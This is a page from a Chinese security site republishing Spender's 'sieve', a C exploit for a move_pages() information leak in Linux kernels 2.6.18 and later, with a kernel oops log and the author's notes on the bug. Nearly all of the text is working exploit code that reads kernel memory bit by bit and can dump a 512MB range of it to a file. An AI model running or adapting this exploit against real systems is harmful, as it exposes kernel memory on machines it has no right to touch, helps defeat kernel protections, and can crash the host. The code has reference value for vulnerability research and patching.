首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linux Kernel 2.6.18 move_pages() Information Leak
来源:spender at getrewted.net 作者:Spender 发布时间:2016-11-24  
/* sieve (because the Linux kernel leaks like one, get it?)
   Bug NOT discovered by Marcus Meissner of SuSE security
   This bug was discovered by Ramon de Carvalho Valle in September of 2009
   The bug was found via fuzzing, and on Sept 24th I was sent a POC DoS
   for the bug (but had forgotten about it until now)
   Ramon's report was sent to Novell's internal bugzilla, upon which 
   some months later Marcus took credit for discovering someone else's bug
   Maybe he thought he could get away with it ;)  Almost ;)
 
   greets to pipacs, tavis (reciprocal greets!), cloudburst, and rcvalle!
 
   first exploit of 2010, next one will be for a bugclass that has
   afaik never been exploited on Linux before
 
   note that this bug can also cause a DoS like so:
 
Unable to handle kernel paging request at ffffffff833c3be8 RIP: 
 [<ffffffff800dc8ac>] new_page_node+0x31/0x48
PGD 203067 PUD 205063 PMD 0 
Oops: 0000 [1] SMP 
Pid: 19994, comm: exploit Not tainted 2.6.18-164.el5 #1
RIP: 0010:[<ffffffff800dc8ac>]  [<ffffffff800dc8ac>] 
new_page_node+0x31/0x48
RSP: 0018:ffff8100a3c6de50  EFLAGS: 00010246
RAX: 00000000005fae0d RBX: ffff8100028977a0 RCX: 0000000000000013
RDX: ffff8100a3c6dec0 RSI: 0000000000000000 RDI: 00000000000200d2
RBP: 0000000000000000 R08: 0000000000000004 R09: 000000000000003c
R10: 0000000000000000 R11: 0000000000000092 R12: ffffc20000077018
R13: ffffc20000077000 R14: ffff8100a3c6df00 R15: ffff8100a3c6df28
FS:  00002b8481125810(0000) GS:ffffffff803c0000(0000) 
knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 000000008005003b
CR2: ffffffff833c3be8 CR3: 000000009562d000 CR4: 00000000000006e0
Process exploit (pid: 19994, threadinfo ffff8100a3c6c000, task 
ffff81009d8c4080)
Stack:  ffffffff800dd008 ffffc20000077000 ffffffff800dc87b 
0000000000000000
 0000000000000000 0000000000000003 ffff810092c23800 0000000000000003
 00000000000000ff ffff810092c23800 00007eff6d3dc7ff 0000000000000000
Call Trace:
 [<ffffffff800dd008>] migrate_pages+0x8d/0x42b
 [<ffffffff800dc87b>] new_page_node+0x0/0x48
 [<ffffffff8009cee2>] schedule_on_each_cpu+0xda/0xe8
 [<ffffffff800dd8a2>] sys_move_pages+0x339/0x43d
 [<ffffffff8005d28d>] tracesys+0xd5/0xe0
 
 
Code: 48 8b 14 c5 80 cb 3e 80 48 81 c2 10 3c 00 00 e9 82 29 f3 ff 
RIP  [<ffffffff800dc8ac>] new_page_node+0x31/0x48
 RSP <ffff8100a3c6de50>
CR2: ffffffff833c3be8
*/
 
#include <stdio.h>
#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/syscall.h>
#include <errno.h>
#include "exp_framework.h"
 
#undef MPOL_MF_MOVE
#define MPOL_MF_MOVE (1 << 1)
 
int max_numnodes;
 
unsigned long node_online_map;
 
unsigned long node_states;
 
unsigned long our_base;
unsigned long totalhigh_pages;
 
#undef __NR_move_pages
#ifdef __x86_64__
#define __NR_move_pages 279
#else
#define __NR_move_pages 317
#endif
 
/* random notes I took when writing this (all applying to the 64bit case):
 
checking in a bitmap based on node_states[2] or node_states[3] 
(former if HIGHMEM is not present, latter if it is)
 
each node_state is of type nodemask_t, which is is a bitmap of size 
MAX_NUMNODES/8
 
RHEL 5.4 has MAX_NUMNODES set to 64, which makes this 8 bytes in size
 
so the effective base we're working with is either node_states + 16 or 
node_states + 24
 
on 2.6.18 it's based off node_online_map
 
node_isset does a test_bit based on this base
 
so our specfic case does: base[ourval / 8] & (1 << (ourval & 7))
 
all the calculations appear to be signed, so we can both index in the 
negative and positive direction, based on ourval
 
on 64bit, this gives us a 256MB range above and below our base to grab 
memory of 
(by passing in a single page and a single node for each bit we want to 
leak the value of, we can reconstruct entire bytes)
 
we can determine MAX_NUMNODES by looking up two adjacent numa bitmaps,
subtracting their difference, and multiplying by 8
but we don't need to do this
*/
 
struct exploit_state *exp_state;
 
char *desc = "Sieve: Linux 2.6.18+ move_pages() infoleak";
 
int get_exploit_state_ptr(struct exploit_state *ptr)
{
    exp_state = ptr;
    return 0;
}
 
int requires_null_page = 0;
 
void addr_to_nodes(unsigned long addr, int *nodes)
{
    int i;
    int min = 0x80000000 / 8;
    int max = 0x7fffffff / 8; 
 
    if ((addr < (our_base - min)) ||
        (addr > (our_base + max))) {
        fprintf(stdout, "Error: Unable to dump address %p\n", addr);
        exit(1);
    }
 
    for (i = 0; i < 8; i++) {
        nodes[i] = ((int)(addr - our_base) << 3) | i;
    }
 
    return;
}
 
char *buf;
unsigned char get_byte_at_addr(unsigned long addr)
{
    int nodes[8];
    int node;
    int status;
    int i;
    int ret;
    unsigned char tmp = 0;
 
    addr_to_nodes(addr, (int *)&nodes);
    for (i = 0; i < 8; i++) {
        node = nodes[i];
        ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
        if (errno == ENOSYS) {
            fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
            exit(1);
        } else if (errno != ENODEV)
            tmp |= (1 << i);
    }
     
    return tmp;
}   
 
void menu(void)
{
    fprintf(stdout, "Enter your choice:\n"
            " [0] Dump via symbol/address with length\n"
            " [1] Dump entire range to file\n"
            " [2] Quit\n");
}
 
int trigger(void)
{
    unsigned long addr;
    unsigned long addr2;
    unsigned char thebyte;
    unsigned char choice = 0;
    char ibuf[1024];
    char *p;
    FILE *f;
 
    // get lingering \n
    getchar();
    while (choice != '2') {
        menu();
        fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
        choice = ibuf[0];
         
        switch (choice) {
        case '0':
            fprintf(stdout, "Enter the symbol or address for the base:\n");
            fgets((char *)&ibuf, sizeof(ibuf)-1, stdin);
            p = strrchr((char *)&ibuf, '\n');
            if (p)
                *p = '\0';
            addr = exp_state->get_kernel_sym(ibuf);
            if (addr == 0) {
                addr = strtoul(ibuf, NULL, 16);
            }
            if (addr == 0) {
                fprintf(stdout, "Invalid symbol or address.\n");
                break;
            }
            addr2 = 0;
            while (addr2 == 0) {
                fprintf(stdout, "Enter the length of bytes to read in hex:\n");
                fscanf(stdin, "%x", &addr2);
                // get lingering \n
                getchar();
            }
            addr2 += addr;
             
            fprintf(stdout, "Leaked bytes:\n");
            while (addr < addr2) {   
                thebyte = get_byte_at_addr(addr);
                printf("%02x ", thebyte);
                addr++;
            }
            printf("\n");
            break;
        case '1':
            addr = our_base -  0x10000000;
#ifdef __x86_64__
            /* 
               our lower bound will cause us to access
               bad addresses and cause an oops
            */
            if (addr < 0xffffffff80000000)
                addr = 0xffffffff80000000;
#else
            if (addr < 0x80000000)
                addr = 0x80000000;
            else if (addr < 0xc0000000)
                addr = 0xc0000000;
#endif
            addr2 = our_base + 0x10000000;
            f = fopen("./kernel.bin", "w");
            if (f == NULL) {
                fprintf(stdout, "Error: unable to open ./kernel.bin for writing\n");
                exit(1);
            }
 
            fprintf(stdout, "Dumping to kernel.bin (this will take a while): ");
            fflush(stdout);
            while (addr < addr2) {
                thebyte = get_byte_at_addr(addr);
                fputc(thebyte, f);
                if (!(addr % (128 * 1024))) {
                    fprintf(stdout, ".");
                    fflush(stdout);
                }
                addr++;
            }
            fprintf(stdout, "done.\n");
            fclose(f);
            break;
        case '2':
            break;
        }
    }
 
    return 0;
}
 
 
int prepare(unsigned char *ptr)
{
    int node;
    int found_gap = 0;
    int i;
    int ret;
    int status;
 
    totalhigh_pages = exp_state->get_kernel_sym("totalhigh_pages");
    node_states = exp_state->get_kernel_sym("node_states");
    node_online_map = exp_state->get_kernel_sym("node_online_map");
 
    buf = malloc(4096);
 
    /* cheap hack, won't work on actual NUMA systems -- for those we could use the alternative noted
       towards the beginning of the file, here we're just working until we leak the first bit of the adjacent table,
       which will be set for our single node -- this gives us the size of the bitmap
    */
    for (i = 0; i < 512; i++) {
        node = i;
        ret = syscall(__NR_move_pages, 0, 1, &buf, &node, &status, MPOL_MF_MOVE);
        if (errno == ENOSYS) {
            fprintf(stdout, "Error: move_pages is not supported on this kernel.\n");
            exit(1);
        } else if (errno == ENODEV) {
            found_gap = 1;
        } else if (found_gap == 1) {
            max_numnodes = i;
            fprintf(stdout, " [+] Detected MAX_NUMNODES as %d\n", max_numnodes);
            break;
        }
    }
 
    if (node_online_map != 0)
        our_base = node_online_map;
    /* our base for this depends on the existence of HIGHMEM and the value of MAX_NUMNODES, since it determines the size
       of each bitmap in the array our base is in the middle of
       we've taken account for all this
    */
    else if (node_states != 0)
        our_base = node_states + (totalhigh_pages ? (3 * (max_numnodes / 8)) : (2 * (max_numnodes / 8)));
    else {
        fprintf(stdout, "Error: kernel doesn't appear vulnerable.\n");
        exit(1);
    }
 
    return 0;
}
 
int post(void)
{
    return 0;
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Chrome Blink SpeechRecognition
·Linux Kernel 2.6.32-rc1 x86_64
·Linux Kernel 2.6.32-642 / 3.16
·Linux Kernel 2.6.x pipe.c Priv
·Microsoft Internet Explorer 8
·Linux Kernel 4.6.3 Netfilter P
·Microsoft Internet Explorer 8
·Microsoft Windows Kernel - 'wi
·TP-LINK TDDP - Multiple Vulner
·GNU Wget < 1.18 - Access List
·NTP 4.2.8p8 - Denial of Servic
·Remote Utilities Host 6.3 - De
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved